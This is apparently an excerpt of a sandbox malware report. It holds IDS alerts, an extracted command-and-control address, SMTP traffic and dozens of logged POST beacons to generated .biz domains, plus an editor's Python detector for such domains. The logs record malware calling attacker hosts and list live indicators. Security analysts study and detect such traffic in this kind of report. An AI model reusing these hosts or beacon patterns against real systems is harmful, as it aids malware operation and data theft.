                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.5:50057
                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.5:50040
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.5:50040
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.5:50057
                            Source: Malware configuration extractor | URLs: 212.162.149.53:2049
                            Source: unknown | DNS traffic detected: English language letter frequency does not match the domain names
                            Source: unknown | Network traffic detected: DNS query count 80
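The two rows above are the report's own heuristic for the Expiro side of this sample: 80 DNS queries in one run, to names whose letter distribution does not look like English, which is why the alerts above match several different random .biz domains. The Python below is an added example by the editor, not sandbox code. It implements that heuristic for the registrable label of each queried host (mean log-probability of the letters under English frequencies, plus the longest consonant run) and then treats several flagged names in one capture as a DGA burst. The host list is taken from this report's DNS queries, Suricata alerts and HTTP Host headers; the likelihood floor, the consonant-run length and the burst threshold are assumptions tuned on these names, and the suffix handling is a simplification that ignores multi-part public suffixes such as co.uk.

```python
import math

# English letter frequencies in percent (the standard published table; any comparable
# table gives the same ordering of the names below).
ENGLISH_FREQ = {
    "a": 8.17, "b": 1.49, "c": 2.78, "d": 4.25, "e": 12.70, "f": 2.23, "g": 2.02,
    "h": 6.09, "i": 6.97, "j": 0.15, "k": 0.77, "l": 4.03, "m": 2.41, "n": 6.75,
    "o": 7.51, "p": 1.93, "q": 0.10, "r": 5.99, "s": 6.33, "t": 9.06, "u": 2.76,
    "v": 0.98, "w": 2.36, "x": 0.15, "y": 1.97, "z": 0.07,
}
VOWELS = set("aeiou")

# Thresholds are assumptions tuned on the names in this report, not published constants.
LIKELIHOOD_FLOOR = -1.60      # mean log10 letter probability below which a label looks random
MAX_CONSONANT_RUN = 4         # a run of this many consonants (y counted as consonant) is unpronounceable
BURST_MIN_FLAGGED = 3         # this many distinct flagged names in one capture = DGA burst

# Hosts from this report's DNS queries, Suricata alerts and HTTP Host headers.
QUERIED_HOSTS = [
    "api.ipify.org",
    "knjghuig.biz", "przvgke.biz", "eufxebus.biz",
    "pywolwnvd.biz", "ssbzmoy.biz", "cvgrf.biz", "npukfztj.biz", "lpuegx.biz",
]


def registrable_label(host):
    """Second-level label of a hostname (simplification: ignores multi-part suffixes such as co.uk)."""
    parts = host.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def english_log_likelihood(label):
    """Mean log10 probability of the label's letters under English frequencies; higher is more English-like."""
    letters = [c for c in label.lower() if c in ENGLISH_FREQ]
    if not letters:
        return 0.0
    return sum(math.log10(ENGLISH_FREQ[c] / 100.0) for c in letters) / len(letters)


def longest_consonant_run(label):
    """Length of the longest run of consecutive consonants; digits and hyphens break a run."""
    run = best = 0
    for c in label.lower():
        if c.isalpha() and c not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def is_dga_like(host):
    """Per-name verdict: random-looking letter mix or an unpronounceable consonant run."""
    label = registrable_label(host)
    return (english_log_likelihood(label) < LIKELIHOOD_FLOOR
            or longest_consonant_run(label) >= MAX_CONSONANT_RUN)


def dga_burst(hosts, min_flagged=BURST_MIN_FLAGGED):
    """Capture-level verdict: (sorted flagged hosts, True if enough distinct names were flagged)."""
    flagged = sorted({h for h in hosts if is_dga_like(h)})
    return flagged, len(flagged) >= min_flagged


if __name__ == "__main__":
    for host in QUERIED_HOSTS:
        label = registrable_label(host)
        print(f"{host:16} likelihood={english_log_likelihood(label):6.2f} "
              f"consonant_run={longest_consonant_run(label)} dga_like={is_dga_like(host)}")
    flagged, burst = dga_burst(QUERIED_HOSTS)
    print(f"burst={burst} flagged={flagged}")
```

One of the names the Suricata rules match, eufxebus.biz, is pronounceable enough to pass both per-name tests, while api.ipify.org (the legitimate external-IP lookup) passes them for the right reason. That is the caveat to carry into a real detection: alert on the burst of distinct flagged names from one host in a short window, not on a single score, and keep exact-match rules such as the ET "DNS Query to Expiro Domain" signatures for the names the heuristic misses.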
                            Source: global traffic | TCP traffic: 192.168.2.5:49706 -> 212.162.149.53:2049
                            Source: global traffic | TCP traffic: 192.168.2.5:49712 -> 51.195.88.199:587
                            Source: Joe Sandbox View | IP Address: 165.160.15.20
                            Source: Joe Sandbox View | IP Address: 104.26.12.205
                            Source: Joe Sandbox View | IP Address: 104.26.12.205
                            Source: Joe Sandbox View | ASN Name: AMAZON-02US
                            Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
                            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknown | DNS query: name: api.ipify.org
                            Source: unknown | DNS query: name: api.ipify.org
                            Source: global traffic | TCP traffic: 192.168.2.5:49712 -> 51.195.88.199:587
                            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: POST /rurmblummdysikl HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                            Source: global traffic | HTTP traffic detected: POST /qmfuhtf HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                            Source: global traffic | HTTP traffic detected: POST /mxhgf HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                            Source: global traffic | HTTP traffic detected: POST /agup HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: cvgrf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                            Source: global traffic | HTTP traffic detected: POST /acnwjlbaxboknfa HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                            Source: global traffic | HTTP traffic detected: POST /dwqgybxwikykky HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                            Source: global traffic | HTTP traffic detected: POST /mvgpsfdcrvitryo HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: cvgrf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                            Source: global traffic | HTTP traffic detected: POST /rrba HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                            Source: global traffic | HTTP traffic detected: POST /ajvaopkagn HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                            Source: global traffic | HTTP traffic detected: POST /ojwgmwlrsgrxkodi HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                            Source: global traffic | HTTP traffic detected: POST /xecqerkyvkn HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: knjghuig.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                            Source: global traffic | HTTP traffic detected: POST /ysrvxblocwefk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                            Source: global traffic | HTTP traffic detected: POST /xkjanqfjaocn HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /xylpjhgrvuhkfdao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /mgu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /pkabvaplwbiqx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /dmaeaf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /vpujdohccl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /gocchgnxicko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /mnoqnjatopaha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /hqlbcdtcv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /fymj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /wbpbmvhlbk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /qohnd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /dvejgi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /kadnnjikurdd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /mngdwptvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /qqxxgql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /sgbnffiuqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /jae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /sptkirsqxflbf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /iafrakxbkhxwqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ucrfyypmempwn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /oiwersrybt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ocntklkd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ndgx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /libobglfegsxaj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /dkwdmdeuhpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /khpdqtysqhg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /icltfkrjatd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /xnxlkgkrmwlxblkt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /hisgijrksnb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /sc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /skpx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /wgcbdp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /sxrtljpowkklyfep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ksvtsx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /thacrmsw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /rdoagulou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
